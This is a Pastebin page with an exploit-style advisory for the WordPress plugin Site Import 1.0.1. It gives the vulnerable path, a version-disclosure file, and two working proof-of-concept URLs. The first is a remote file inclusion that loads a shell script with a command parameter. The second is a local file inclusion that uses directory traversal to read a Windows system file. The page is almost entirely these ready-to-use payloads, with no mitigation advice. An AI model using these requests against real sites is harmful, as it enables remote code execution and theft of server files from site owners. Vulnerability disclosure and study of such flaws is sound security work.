Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: Wordpress Site Import 1.0.1 | Local and Remote file inclusion
- # Exploit Author: Wadeek
- # Website Author: https://github.com/Wad-Deek
- # Software Link: https://downloads.wordpress.org/plugin/site-import.1.0.1.zip
- # Version: 1.0.1
- # Tested on: Xampp on Windows7
- [Version Disclosure]
- ======================================
- /wp-content/plugins/site-import/readme.txt
- ======================================
- [PoC]
- ======================================
- Remote File Inclusion == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=http%3a%2f%2flocalhost%2fshell.php?shell=ls
- Local File Inclusion == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
- ======================================
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
